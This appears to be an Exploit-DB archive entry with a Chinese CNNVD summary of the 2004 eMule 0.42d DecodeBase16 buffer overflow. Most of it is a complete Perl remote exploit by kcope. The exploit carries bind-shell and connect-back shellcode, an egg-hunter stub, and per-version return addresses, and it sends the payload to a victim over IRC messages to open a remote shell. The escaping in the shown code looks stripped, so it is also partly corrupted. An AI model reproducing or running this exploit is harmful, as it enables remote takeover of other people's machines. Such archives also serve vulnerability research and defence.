https://www.exploit-db.com/exploits/175
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-890

eMule是一款可靠的点对点档案共享客户端。eMule在进行内存拷贝时缺少正确缓冲区边界检查，远程攻击者可以利用这个漏洞进行缓冲区溢出攻击，可能以进程权限在系统上执行任意指令。问题存在于eMulev0.42d的DecodeBase16(…)函数中，这个函数接收十六进制字符串，长度和目标缓冲区作为参数，函数没有对输入的字符串进行任何检查，超长的字符串可导致触发缓冲区溢出，精心构建提交数据可能以进程权限在系统上执行任意指令。

#!/usr/bin/perl
#
# eMule <= 0.42d Remote Exploit by kcope
# 
# exploits the DecodeBase16 buffer overflow
# tested on WinXP SP1 / Win2k SP4
# bindport/connectback shellcode
#
# thanks Kostya Kortchinsky for his posting to bugtraq
# 
# greetings to sander, blackzero, beginna, adize, A-cru and wY :p
# have fun!
#
# kcope, kingcope gmx net Apr 2004
#

use Socket;
use Getopt::Std;

# bindport shellcode (port 2004) thanks to metasploit
$sc = "xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x21x39".
"x11x09x83xebxfcxe2xf4xc9x6fx11x09x21x6ax44x5fx76".
"xb2x7dx2dx39xb2x54x35xaax6dx14x71x20xd3x9ax43x39".
"xb2x4bx29x20xd2xf2x3bx68xb2x25x82x20xd7x20xf6xdd".
"x08xd1xa5x19xd9x65x0exe0xf6x1cx08xe6xd2xe3x32x5d".
"x1dx05x7cxc0xb2x4bx2dx20xd2x77x82x2dx72x9ax53x3d".
"x38xfax82x25xb2x10xe1xcax3bx20xc9x7ex67x4cx52xe3".
"x31x11x57x4bx09x48x6dxaax20x9ax52x2dxb2x4ax15xaa".
"x22x9ax52x29x6ax79x87x6fx37xfdxf6xf7xb0xd6x88xcd".
"x39x10x09x21x6ex47x5axa8xdcxf9x2ex21x39x11x99x20".
"x39x11xbfx38x21xf6xadx38x49xf8xecx68xbfx58xadx3b".
"x49xd6xadx8cx17xf8xd0x28xccxbcxc2xccxc5x2ax5ex72".
"x0bx4ex3ax13x39x4ax84x6ax19x40xf6xf6xb0xcex80xe2".
"xb4x64x1dx4bx3ex48x58x72xc6x25x86xdex6cx15x50xa8".
"x3dx9fxebxd3x12x36x5dxdex0exeex5cx11x08xd1x59x71".
"x69x41x49x71x79x41xf6x74x15x98xcex10xe2x42x5ax49".
"x3bx11x0exf5xb0xf1x63x31x69x46xf6x74x1dx42x5exde".
"x6cx39x5ax75x6exeex5cx01xb0xd6x61x62x74x55x09xa8".
"xdax96xf3x10xf9x9cx75x05x95x7bx1cx78xcaxbax8exdb".
"xbaxfdx5dxe7x7dx35x19x65x5fxd6x4dx05x05x10x08xa8".
"x45x35x41xa8x45x35x45xa8x45x35x59xacx7dx35x19x75".
"x69x40x58x70x78x40x40x70x68x42x58xdex4cx11x61x53".
"xc7xa2x1fxdex6cx15xf6xf1xb0xf7xf6x54x39x79xa4xf8".
"x3cxdfxf6x74x3dx98xcax4bxc6xeex3fxdexeaxeex7cx21".
"x51x6fxd1xc3x4axeex5cx25x08xcax5axdexe9x11x09";

# connect back shellcode by lion, xor 0x21 
$cbsc = 
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx21xE2xFA".
"xEBx05xE8xEBxFFxFFxFF".
"xC8xDAx21x21x21x7Ex45x80x11x21x21x21xAAx61x2DxAA".
"x51x3Dx8CxAAx49x29xAAxD6x4Bx25x78xC9xBAx21x21x21".
"xC3xD8x49x12x13x21x21x49x56x52x13x7Ex75xDEx37xAA".
"xC9x4Bx25x78xC9xA3x21x21x21xC3xD8xA0xCDxB1x20x21".
"x21x75x49x20x20x21x21xDEx77x31x71x71x71x71x61x71".
"x61x71xDEx77x35xAAxF9x49x5Ex21x21x20x49x23x21x21".
"x14xAAxEDx4Bx31x70x72xDEx77x39xA4xE1x54x6Bx49x42".
"x4Cx45x21xA8x47x11xA2xCDx75xACx1Dx05x4Bx34x78x8A".
"xC3xDCxE7x65x05x31x65xDFx65x05x1CxA8x7Dx05x69xA8".
"x7Dx05x6DxA8x7Dx05x71xACx65x05x31x75x71x70x70x70".
"x4Bx20x70x70xDEx57x11x70xDEx77x25xAAxEDx4BxDExDE".
"x10xDEx77x29x72xDEx77x3DxDEx77x2Dx70x77xAAx64x1D".
"xAAx75x09x59x22xF4x73xAAx53x01x22xD4x12xE8x68x60".
"x8Cx22xE4x12xFAx2Ex9Fx31x1BxF7x55x29xE0xEAx2Cx22".
"xFBx61xCAxD0x1Ax3Ex54xC6x7BxAAx7Bx05x22xFCx47xAA".
"x2Dx6AxAAx7Bx3Dx22xFCxAAx25xAAx22xE4x8Ax7Fx78xE2".
"xC9x21xDExDExDExAFx6Fx2FxCDx53xDFx92x37x8CxF8x24".
"xEFx5FxF9xC3x52xEAxCCxDDx1AxF8x28xD4x8CxCDxD8x8B".
"x41xC6x58xE7x58";

# find shellcode in memory
$find_sc = "648B3D08000000BA0100000042424264".
"8B1A8BCB2BCFB0D9909090FCF2AE803F".
"EE9075F8807F01D975F2BA0100000042".
"803C3A7475E64FFFE79090";

$find_sccb = "648B3D08000000BA0100000042424264".
"8B1A8BCB2BCFB0EB909090FCF2AE803F".
"109075F8807F015B75F2BA0100000042".
"803C3A4B75E64FFFE79090"; 

$numtargets = 4;

@targets = 
(
["eMule 0.42d", "7af65700", 76],
["eMule 0.42c", "514c5f00", 76],
["eMule 0.42b (Hotfix)", "d12e5f00", 76],
["eMule 0.42a", "012f5f00", 76]
# ["eMule 0.30e", "acf65b00", 20]
);

$exploiting_nick = "eMuleIRC3713"; # change this nickname if needed

sub connecttoserver()
{
$bool = "yes";
$iaddr = inet_aton($ircserver) || die("Failed to find host: $ircserver");
$paddr = sockaddr_in($ircport, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK1, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:$!");
connect(SOCK1, $paddr) || {$bool = "no"};
}

sub usage() {

print "usage: emule4x.pl -n <nick> -s <server> <-t type> [-p port] [-c <ip:port>]rn".
"use -c switch for reverse shellrn". 
"example: perl emule4x.pl -n emuleuser -s irc.somenet.com -t 0rnrntarget types:rn";

for ($i=0; $i<$numtargets; $i++) {
print "t[".$i."]...". $targets[$i][0]. "rn";
} 
exit;
}

$| = 1;
print "rn----------------------------------------------------------------------rn";
print "eMule <= 0.42d Remote Exploit by kcope . kingcope[at]gmx.netrnr";
print "Tested on Win2k SP4/WinXP SP1rn";
print "----------------------------------------------------------------------rnLets have fun!rnrn";

if (@ARGV < 4) {
usage(); 
}

%options=();
getopt("scnpt",%options);

$nickname = $options{n};
$ircserver = $options{s};
$type = $options{t};

if (!defined $targets[$type][0]) {
print "Invalid target type.rn";
exit;
}

if (!defined $type) {
print "Please specify a target type.rn";
exit;
}

if (defined $options{p}) {
$ircport = $options{p};
} else {
$ircport = 6667;
}

$usecb=-1;
if (defined $options{c}) {
$usecb=1;
$idx = index $options{c},":";
$cbip = substr $options{c},0,$idx;
$cbport = substr $options{c},$idx+1; 
}

print "Target type set to ".$targets[$type][0].".rn";
$ret = $targets[$type][1];
$nops1 = "90" x $targets[$type][2];
$nops2 = "90" x 40; # customize if needed

if ($usecb eq 1) {
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
$a1 = chr(ord($a1) ^ 0x21);
$a2 = chr(ord($a2) ^ 0x21);
$a3 = chr(ord($a3) ^ 0x21);
$a4 = chr(ord($a4) ^ 0x21);
substr($cbsc, 111, 4, $a1 . $a2 . $a3 . $a4);

($p1, $p2) = split(//, reverse(pack("s", $cbport)));
$p1 = chr(ord($p1) ^ 0x21);
$p2 = chr(ord($p2) ^ 0x21);
substr($cbsc, 118, 2, $p1 . $p2);

print "Using connect back method on $cbip port $cbport.rn";
}

print "Connecting to $ircserver on port $ircport...";

connecttoserver();

if ($bool eq "no")
{
print "Connection refused.rn";
exit(0);
}

send(SOCK1,"NICK $exploiting_nickrn",0);
send(SOCK1,"USER $exploiting_nick "yahoo.com" "eu.dal.net" :$exploiting_nickrn",0);

while (<SOCK1>) { 
$line = $_;
# print $line;
if ((index $line, " 376 ") ne -1) {
goto logged_in; 
}

if ((index $line, "PING") ne -1) {
substr($line,1,1,"O");
send(SOCK1, $line, 0); 
}
}

logged_in:

print " okrn"; 
sleep(4); 
print "Sending buffers to $nickname...";

# 005f4c51 eMule 0.42c (514c5f00)
# 0057f67a eMule 0.42d (7AF65700)

if ($usecb eq 1) {
send(SOCK1, "PRIVMSG $nickname :$cbscrn", 0);
send(SOCK1, "PRIVMSG $nickname :x01SENDLINK|" . $nops1 . "EB079090". $ret .
"906681EC4000". $nops2 . $find_sccb ."|x01rn", 0);
} else {
send(SOCK1, "PRIVMSG $nickname :$scrn", 0);
send(SOCK1, "PRIVMSG $nickname :x01SENDLINK|" . $nops1 . "EB079090". $ret .
"906681EC4000". $nops2 . $find_sc ."|x01rn", 0); 
}

if ($usecb ne 1) {
print "rnNow try connecting to ".$nickname."'s ip on port 2004.rn";
} else {
print "rnWatch at your netcat for some shell.rn"; 
}

$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
print " donern";

# EOF 

# milw0rm.com [2004-04-12]

来源:BID
名称:10039
链接:http://www.securityfocus.com/bid/10039
来源:www.emule-project.net
链接:http://www.emule-project.net/home/perl/news.cgi?l=1&cat;_id=22
来源:SECUNIA
名称:11289
链接:http://secunia.com/advisories/11289
来源:XF
名称:emule-decodebase16-bo(15730)
链接:http://xforce.iss.net/xforce/xfdb/15730
来源:BUGTRAQ
名称:20040403eMulev0.42dBufferOverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108100987429960&w;=2
来源：NSFOCUS
名称：6274
链接：http://www.nsfocus.net/vulndb/6274